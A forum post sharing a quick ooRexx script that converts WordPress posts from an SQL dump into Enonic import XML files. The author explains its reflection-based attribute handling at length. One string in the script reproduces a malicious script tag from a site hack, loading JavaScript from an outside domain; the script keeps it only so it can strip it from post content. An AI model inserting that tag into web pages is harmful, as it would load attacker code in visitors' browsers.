Just a little code example... - small script I wrote to import posts from wordpress to a blog on enonic

So, I probably should give you the background.

Wordpress site hacked repeatedly. Had a database dump.
Database dump is one massive text file.
grepped it for insert into the wp_post table… That gave me a set of posts.
I was not really interested in restoring everything. I am just trying to get myself a head start.

So this script is written in oorexx. It’s quick, dirty, horribly documented.
I also made a template.xml file based upon an export which I took of a node using the data manager. I have then deleted the ID (so it generates it) and added a couple of tags which my script uses to do a replace. These are between ** **.

I haven’t tested it yet against 7.6 (my machine is on 7,5) but it seems to do the trick, and I was able to upload a large number of articles…

Might be helpful to someone, and looking at my oorexx code should be obligatory… if only because I use more and more obscure techniques to achieve results…

– Somewhat entertaining code for anyone interested in OO dev below – well I like looking at odd programming languages! –

/* 
So here is some really rather ugly oorexx 
which I used to to fix a data import 

usage "rexx procallarticles.rexx [DEBUG]" 

*/

/* this might enable debugmode if you execute it from the command line passing the word DEBUG
    I haven't actually tested whether it works 
*/ 
parse arg upper InDebugMode

/* this is the filename for the rather massive file which has everything from wp_posts database table, exported as an SQL Dump.  This is what I have to work with */ 
filename = "./allarticles.txt" 
/* The file is a mess... when my editor complains that the lines are over 10,000 chars long ... one has to question whether they could have done it any neater*/

/* 
So this is the filename of the template file based upon an export of a node for a post taken from my enonic install
I have removed the ID from the top, and have inserted some placeholders which I will replace once processing is done.
*/
templatefilename = "./template.xml" 


/* The output of this script is that it reads the SQL Dump, removes rubbish, and creates nice XML files for all the relevant posts, which are then zipped up and can be uploaded to enonic's data manager via the node Exports
so that they can then be imported into the data store for posts.

I am going to export the xml files generated 
./posts-master-21.../posts/(Specific Post Directory)/_/node.xml ... 
 (element1)(element2)(specificPostDirectory)(element3)(element4)

So this is where I set up the four common parts of the 5 elements in the naming 
*/
exportDirectoryElement.0 = 4
exportDirectoryElement.1 = "posts-master-2021-02-05T07-31-40/"
exportDirectoryElement.2 = "posts/" 
/* exportDirectoryElement.2.5 is the specificPostDirectory so not defined here */ 
exportDirectoryElement.3 = "/_/"
exportDirectoryElement.4 ="node.xml"

/*  So that I can examine the data, I am going to 
    additionally export all the data from the rexx objects 
    
    I should note that I am not putting any serialization behaviour here.  
    The purpose is so that I can look at all the data... and to see if I can improve my import.
*/
filepathRexxExport = "allDataInObjects/"

/* just in case, lets make that directory*/
"mkdir "||filepathRexxExport

/* 
    this is where I would normally put something to 
    rm -rf posts-maste.../posts/ 
    but as I am sharing this file... I don't think I will 
*/ 

/* load the template file into a string 
   We will amend a copy of this string for each object */
template = charin(templatefilename,1, chars(templatefilename)) 

/* Define the seperator ... this is what we look for as the terminator between different posts in the sql  */ 
SeperatorKey = '),('                                     /* don't make rude jokes.  We are all far too old */ 

/*     /* this is the insert text we know is in the SQLDump and we probably don't want it */  */
sqlstring = "INSERT INTO `wp_posts` VALUES"

/*  and this string is here as it was injected into every content post thanks to one of those little bugs in Wordpress 
    .... during one of the multiple hacks on our site.  
    this wasn't even the bad hack ... just a slightly annoying one ... 
    so I have it here so I can remove it from the content. 
*/
hackstring = "<script src=\'https://drake.strongcapitalads.ga/m.js?n=ns1\' type=\'text/javascript\'></script>" 

/* set a variable so my debug code only runs when required */
debug = .false 

if InDebugMode = "DEBUG" then do 
    debug = .true 
end 



/* so we load everything into memory in one shot ... who needs more than 640k anyway ... */
data = charin(filename,1,chars(filename)) 
/*  I could (I suppose) make this more elegant and actually think about ram, closing the stream etc... 
    but in practice, the amount of data, whilst more than practical to copy-paste, is under 100 meg... 
    so it will run in seconds.
*/ 

/* I am going to look through to find the seperator keys so this is a shortcut */ 
breaklocation = 1
/* I want to know how many I have done, and once again, lazy programming always wins...*/
articlecount = 0

/* so I do my loop */
do until breaklocation < 1 /* if the key for the next record is at a position of 0 ... we must be at the end */ 

    articlecount = articlecount + 1  /* because I'm sure we will find one */
    datatotallength = length(data) /* by getting the length of the data we can quickly chop it */

    breaklocation = pos(SeperatorKey,data) /* gives us a position, needle in haystack */
    
        /* something I put here for debugging */ 
        
        if debug = .true then do 
            say "article" articlecount "breaklocation" breaklocation "datalength" datatotallength 
        end 
    
    /* so the important bit is the bit I am going to use */ 
    importantbit = left(data,breaklocation)
    importantbitlength = length(importantbit) + 1 /* I want to chop off enough */ 
    
    /* so I could probably just do this once, but I can't be entirely sure it won't have the SQL multiple times */
    if pos(sqlstring,importantbit) = 1 then do
        importantbit = right(importantbit,length(importantbit)-length(sqlstring))
    end 

    /* this dumps the lot to screen which has been identified as a chunk, and then waits on the enter key */ 
    if debug = .true then do 
        say importantbit 
        pull k
    end
    
    /*  time to get OO, and create an object ... 
        If you thought that rexx was a language for procedural dinosaurs working exclusively on mainframes
        this is where we take the red pill... 
    */ 
    
    p = .WordPressPost~new() /* create a wordpresspost object - You'll find that at the bottom where you see class */ 
    /* p is the object we create of class WordPressPost (the . before it means we are using the class object not an instance of the class.  ~new() returns us the instance)  */ 
            
    p~load(importantbit) /* give it the raw data for the bit which is relevant, it populates the its attributes */ 
    /* method calls are indicated by the ~ not a . as in java */ 
    
    
    /* you know how I said we had a little hacking issue... this removes their injected string */
    p~remove(hackstring,"post_content")
    
    /* and I am also going to remove a whole lot of other rubbish as well */
    p~remove("<!-- wp:paragraph -->","post_content")
    p~remove("<!-- /wp:paragraph -->","post_content")
    p~remove("<!-- wp:heading -->","post_content")
    p~remove("<!-- /wp:heading -->","post_content")
    p~remove("   ","post_content") /* tidy up multiple blank spaces */
    
   
    /* I explain how this works in greater depth in the WordPressPost object 
    
       What I am doing is using reflection, passing the string I want gone, and the name of the attribute where I want it gone.  The remove and replace methods get the attribute value based on the name given
       (or using an attribute number, set up in constants in the class) 
       They will then remove or replace the text (remove is simply a convenience method for replace setting no value on replacement) and then set the value of the attribute again. 
    */
    
    /* I am going to put something more elegant here but this fixed some problems with file names on import */ 
    p~replace("?","post_title","")      
    
    /* And this is a strip and trim operation, because nobody likes wasted space */ 
    p~stripAll
    p~makeAllJSONSafe
         
    
    /*
    I display the post content ... so we can check it. 
    */ 
    
    say p~post_content
    
    /* and display some other useful fields as well just check that everything has parsed in and loaded up correctly */
    say "ID" p~id "TITLE" p~post_title "POSTTYPE" p~post_type "POSTSTATUS" p~post_status "POSTDATE" p~post_date
    say "GUID" p~guid
    
    
    /* 
        Right, so time for me to have some fun... let's talk through this... 
        
        I put a copy of the text of he template into the object. 
        I then use the wordpress rexx object string replacements to replace the placeholders 
        with the relevant content. 
    
    */ 
    
    p~template = .string~new(template)        
    
    /* This is the bit where I am replacing things in that template */
    /* Syntax ... needle, haystack, tackWeWillPutInToReplaceNeedle, and note, it is using the attribute name rather than the actual content of the haystack */
    
    p~replace("**POST**","template",p~post_content)                 /* Replace the section where the post should be */ 
    
                                            /* Set the creation date to the post's date first word ie. the date bit */
    p~replace("**CREATE_DATE**","template",word(p~post_date,1))     
    
    p~replace("**TITLE**","template",p~post_title)                  /* And set the title */
    
    /* 
    That's all I am going to do for the moment... but if it works I will end up thinking about how to do more here. 
    */
    
        /* 
            When I say specificPostDirectory, I mean the bit of it which is different from the other posts we are importing.  We are going to base this page name on the post_title, and make it safe.
            
            I was using a very klunky method, I have now moved the majority of the code over to makeJSONSafe 
        */
    
        p~specificPostDirectory = p~post_title
        p~remove("\","specificPostDirectory")
        p~remove("`","specificPostDirectory")
        p~remove("'","specificPostDirectory")
        p~remove(",","specificPostDirectory")
        p~remove("/","specificPostDirectory")
        p~remove("{","specificPostDirectory")
        p~remove("}","specificPostDirectory")
        p~remove("~","specificPostDirectory")
        p~remove(".","specificPostDirectory")
        p~remove("?","specificPostDirectory")
        p~remove('"',"specificPostDirectory")
        p~replace(" ","specificPostDirectory","_")
        p~specificPostDirectory = left(p~specificPostDirectory,30,_)
        
        /* 
            So this is the bit where I generate files. I am only doing that for certain documents on my system.         
            posts which were published. 
        */ 
        if p~post_type <> "post" then do 
        
        
            /* 
                I want to make sure that I have a directory, to put my export file.  So because things change
                I am using the shell to make the directory.  
                Rather than hard code the directory path down here, it is set at the top of the file in a set of stem variables.  One place to change. 
            */
                        
            "mkdir "||exportDirectoryElement.1
            "mkdir "||exportDirectoryElement.1||exportDirectoryElement.2
            "mkdir "||exportDirectoryElement.1||exportDirectoryElement.2||p~specificPostDirectory 
            "mkdir "||exportDirectoryElement.1||exportDirectoryElement.2||p~specificPostDirectory||exportDirectoryElement.3
            
            /* fn is the file name with path of the xml file we will write out with the amended template text */
            
            fn = exportDirectoryElement.1||exportDirectoryElement.2||p~specificPostDirectory||exportDirectoryElement.3||exportDirectoryElement.4
            
            say fn
            
            /* writes the file */
            rc=charout(fn,p~template)
            /* close the stream ... not needed but ... might help */
            rc=stream(fn, "c","close" )
            say rc 
            if rc !="READY"  then do
                pull key 
            end 
        end /* end of the save of the template */ 
    
    /* pull a key if we are in debug */
    if debug = .true then do 
        say p~post_content /* if I am in debug mode I probably want to see the post content... otherwise...  */ 
        pull k 
    end 
    
    /* So now I have clearly finished with the object, I am going to save it to file so I can check it later */
    p~saveToFile(filepathRexxExport)
    
    /* resize the loaded data to remove the section we have already created an object for by doing a right chop */ 
    data = right(data,datatotallength-importantbitlength)
    
end 
/* End of my loop */

/* 
I have to make a zip file to upload, so I might as well do it here... 
*/
"cd "||exportDirectoryElement.1||"; zip postsToExport.zip -r posts/" 

Say "done!" 
exit 


/* 
It's an ooRexx class, representing the WordPressPost Database format. 
*/

::class WordPressPost public

/* 
So an attribute is a quick way of defining a setter and getter for a variable
these attributes are taken from the wordpress schema with some minor name changes
I have done things "nicely" here... these ones are clearly defined in the source code... 
You will see I could have avoided typing all of this 
*/

::attribute id
::attribute author_id
::attribute post_date
::attribute post_date_gmt
::attribute post_content
::attribute post_title
::attribute post_excerpt
::attribute post_status
::attribute comment_status
::attribute ping_status
::attribute post_password
::attribute post_name
::attribute to_ping
::attribute pinged
::attribute post_modified
::attribute post_modified_gmt
::attribute post_content_filtered
::attribute post_parent_id
::attribute guid
::attribute menu_order
::attribute post_type
::attribute post_mime_type
::attribute comment_count

/* 
The attributes here are not "from the database".  It is where I will put a copy of the string with the template text in it which will have the replacements made.
*/
::attribute template 

/* 
The individual directory in the posts folder in which the xml file is exported

part of the reason I have done this is so that I can tidy up the code and turn this into a method at a later date, returning a tidy version instead
*/ 

::attribute specificPostDirectory

/*
I could have used some rather nifty reflection to determine these and issue them numbers ... 
and defined the "unknown" method to avoid actually setting any of the attributes
and just defined them on the fly...
but given this is a quick and dirty job, I have just copied their names into a set of constants and written numbers by hand... 
The purpose of this is so that I can iterate through the numbers, to get the names, to then use reflection to access the named attributes.

The first entry here is at attribute rather than a costant.  
It is a counter of the number of items, and is the value is set at 23 in the method init
*/

::attribute atr.0  /* I haven't made this a constant  */
::constant atr.1 "id"
::constant atr.2 "author_id"
::constant atr.3 "post_date"
::constant atr.4 "post_date_gmt"
::constant atr.5 "post_content"
::constant atr.6 "post_title"
::constant atr.7 "post_excerpt"
::constant atr.8 "post_status"
::constant atr.9 "comment_status"
::constant atr.10 "ping_status"
::constant atr.11 "post_password"
::constant atr.12 "post_name"
::constant atr.13 "to_ping"
::constant atr.14 "pinged"
::constant atr.15 "post_modified"
::constant atr.16 "post_modified_gmt"
::constant atr.17 "post_content_filtered"
::constant atr.18 "post_parent_id"
::constant atr.19 "guid"
::constant atr.20 "menu_order"
::constant atr.21 "post_type"
::constant atr.22 "post_mime_type"
::constant atr.23 "comment_count"

/*
This is run when the object is initialised.  
I have intentionally exposed atr.0 this runs as the object is being set up.
I then set the value to 23 which is the same as the list of constants.  
*/
::method init
expose atr.0 
atr.0 = 23 


/* this is my method for loading up the attributes from the SQL string */ 
::method load
use arg fromSql /* pulls the string in with the sql insert */ 
/* then does this rather inelegant parse value, to break it into the parts ...*/
parse value fromSql with "(" self~id ',' self~author_id ",'" self~post_date "','" self~post_date_gmt "','" self~post_content "','" self~post_title "','" self~post_excerpt "'," self~post_status "," self~comment_status "," self~ping_status "," self~post_password "," self~post_name "," self~to_ping "," self~pinged "," self~post_modified "," self~post_modified_gmt "," self~post_content_filtered "," self~post_parent_id "," self~guid "," self~menu_order "," self~post_type "," self~post_mime_type "," self~comment_count ")"
/* the Rexx Parse command is pretty damn good */
       
  
/*  I am sure I put somewhere else that I was avoiding using reflection in ooRexx
because it's not very well understood, by people who don't do a lot of ooRexx.. 
but ... 
well... I had to... I can't help myself sometimes (ok, I use it a lot) 
reflection it is .... so hopefully this is clear and it saves some time... 
*/ 

::method stripAll
/* so recall that self~atr.0 is set to 23, the number of attributes starting at 1*/ 
do i = 1 to self~atr.0                 /* so we iterate through them */ 
    value = self~getAttributeValue(i)
    value = value~strip("B","'") /* '   <-- that single quote is to get my colour coding to not go crazy... 
                                        now we will remove any single quotes from both sides */
    value = value~strip("B")     /*     and any extra spaces as well from both sides as well */
    self~setAttributeValue(i, value) /* get the name of the attribute which we have been working on 
                                        and set the now amended value back */
end 


/* 
So the next two methods are here to try to minimise the number of data errors which I get 
when I import.  The makeAllJSONSafe is a loop run over the attributes of makeJSONSafe.
*/ 



::method makeAllJSONSafe
do i = 1 to self~atr.0
    self~makeJSONSafe(i)
end 

/* 
One of the advantages of the technique which I have used here, using reflection and having the code being happy
with being passed around a number (as in an integer 1 - 23) which is then used to look up the attribute name but which will work just as well if you actually give it an attribute name directly, is that the source code for doing multiple replacements for each field 
can be written in a very clear and manageable fashion.  Once you know that this code will be run on all those attributes when makeAllJSONSafe is run it becomes very obvious where to make changes. 
*/

::method makeJSONSafe
use arg attributeName
/* I don't know if I've mentioned it yet, but here is as good a place as any.  
ooRexx methods use the term "use arg (variable)".  Just in case you had got this far and were wondering how the object passing was defined. 

Methods run in their own memory space (quite an important consideration when you realise ooRexx is polymorphic, multi inheritance, 
with mixin classes, and runs in an interpreter) - I could go on about class construction design decisions ...

Anyway, more of me using the self object to run methods on attributes by parameter (rather than using the more straightfoward technique, where one simply typing every combination out long hand...) so it's all done using reflection to query and then amend the correct values 
*/

self~remove("\n",attributeName)
self~replace("<",attributeName,"&lt;") 
self~replace(">",attributeName,"&gt;")
self~replace("\`",attributeName,"`") /* If it was slashed we unslash it*/ 
self~replace("`",attributeName,"\`") /* and reslash it either way */
self~replace("\'",attributeName,"'") /* If it was slashed we unslash it*/ 
self~replace("'",attributeName,"\'") /* and reslash it either way */
self~replace('\"',attributeName,'"') /* If it was slashed we unslash it*/ 
self~replace('"',attributeName,'\"') /* and reslash it either way */
self~replace('{',attributeName,'\(')
self~replace('}',attributeName,'\)')
self~remove(x2c('09'),attributeName)
self~remove("&nbsp;",attributeName)


/*  xrange print provides a safe list of letters 
    anything outside of that list is liable to cause issues with the json import
    I should point out that it's not guaranteed that they would cause issues, but 
    when I had repeated json errors on import, I decided to take the "better safe than sorry" approach. 
    and to simply delete any letter which fell outside the range. xrange print is reasonably broad.
    
    verify is a built in function which returns 0 if all the letters are within the specification , or the character position of the 
    first instance of a letter outside the defined list (in this case, provided by xrange("print") 
    
    To get the single letter from the string, I am using a method of the string class ~subchar(position) which works due to the fact that the value can be presented as a string (and therefore rexx will be happy to dynamically cast it to a string). 
    
    
*/
badletterpos = verify(self~getAttributeValue(attributeName),xrange("PRINT")) 
do while badletterpos <> 0 
    self~badlettersDetected = badletterpos /* yes, this is very sneaky ... unknown! */
    badletter = self~getAttributeValue(attributeName)~subchar(badletterpos) 
    self~remove(badletter,attributeName)
    badletterpos = verify(self~getAttributeValue(attributeName),xrange("PRINT")) 
end


/*  wordpress litters data with comments, so this is to clear them and anything else out and replace with a single spacce  
This uses the replace method to actually achieve it - so it is a convenience method 
By having it independently of replace, it allows you to be clear in your code as to your intention. 
*/

::method remove
use arg needle, attributeName
self~replace(needle,attributename," ")

/* the code which actually replaces a given data string (the needle) with the replacement 
   The attributeName is where the "haystack" with the data originates (and where the new haystack which has the needle removed, will be placed).  This will work either with numbers or names... 
*/
::method replace
use arg needle, attributeName, replacementtack 
HaystackWithoutNeedle = ChangeStr(needle,self~getAttributeValue(attributename),replacementtack)
self~setAttributeValue(attributeName, HaystackWithoutNeedle)    


/*  If you ask for an attribute using a name ... brilliant. but if you have a number from the constants 
we can look it up for you, determine the name for you and return it.
*/ 

::method getAttributeName
  use arg attributeRequested
if datatype(attributeRequested,"numeric") = .true then do
    name = self~send("atr."||attributeRequested)
end 
else do 
    name = attributeRequested 
    /* I really should check you are actually requesting a valid attribute but I don't */ 
end
return name

/* 
I assume that none of the attributes have numbers as their names
This means that if you do a "getAttributeValue(1) it will return the value of the attribute where the name is the one in the constant with the number 1. 

Equally, if you just ask for an attribute by name, it will return the result.
Why do I think it is better to write

bogon = instanceOfClass~getAttributeValue("Content") 

rather than 

bogon = instanceOfClass~Content()

Well, for starters it allows you to run through them in a loop, pulling the listed attributes ...

Also, it can allow for better factorisation.
    
*/
::method getAttributeValue
   use arg attributeName 
   
if attributeName~dataType("number") = .true then do 
    attributeName = self~getAttributeName(attributeName)
end
   
   return self~send(attributeName) /* and if we send the attribute name to self, it should return the value */ 

   
/* 
I might want to set an attribute value by name or number, so lets make that easy... 
*/ 
   
::method setAttributeValue
use arg attributeName, valueToSet
if attributeName~dataType("number") = .true then do 
    attributeName = self~getAttributeName(attributeName) /* If we've been handed a number, we look up the name */
end 
self~send(attributeName||"=", valueToSet) /* and once we have the name we set the value accordingly */


/* 
Export the current rexx state
by printing out a file
*/ 
::method saveToFile
use arg filepath
fn = filepath||self~specificPostDirectory||"rexxObjectExport.txt"
do i = 1 to self~atr.0
    rc = lineout(fn,self~getAttributeName(i)":")
    rc = lineout(fn," ")
    rc = lineout(fn,self~getAttributeValue(i))
    rc = lineout(fn," ")
end 

/* and I will also output the current state of the template */ 

rc = lineout("Template :")
rc = lineout(fn," ")
rc = lineout(fn,self~template)
rc = lineout(fn," ")

/* and then close the stream */ 
rc = stream(fn,"c", "close") 


/*
And now for something a little special 
So what I have here is the unknown method.  This is a catch all method. 
What I am doing here is just for a bit of fun.  I have called on a method (in the code) which was not defined in the object
So I am going to let the unknown method set it up for me. and set up the same lookup style as I have for the other 
methods based on the constants at the top of the class. 

Just a bit of fun :) 

*/
::method unknown
use arg name, arguments

methodn = name 

if pos("=",name) > 0 then do /* is it a setter */ 
    methodn = left(methodn,length(methodn)-1) /* I want the name, not the = sign if it's a setter */ 
end 

/* increment the lookup counter */ 
attrnumber = self~atr.0 + 1 
self~atr.0 = attrnumber


self~makeGetterAndSetterMethod("atr."||attrnumber)
self~makeGetterAndSetterMethod(methodn)

/* and I set the name so I can find it */
self~setAttributeValue("atr."||attrnumber,methodn)

/* because of how I have treated it, even though it is actually two seperate methods (source identical to the effect of an attribute) so now it will be one of the values iterated through should I iterate through the "attributes" my methods can get and set it by name or reference.  This will be apparent once we look at the objects export (via saveToFile) where it will sometimes appear and sometimes won't */ 

/* now we have created the method and a setter and getter (the same as an Attribute does in the background we can just pass it back */
/* send along the message with the original args */
forward to(self) message(name) arguments(arguments)


/* 
and my code for creating getter and setter methods on request 
*/ 

::method makeGetterAndSetterMethod
use arg name 
/* set up a setter*/
source = "expose "||name||";use arg "||name||";" 
self~setMethod(name||"=",source,"object")
/* set up a getter*/
source = "expose "||name||";return "||name||";" 
self~setMethod(name,source,"object")
2 Likes

Thanks for sharing Tom.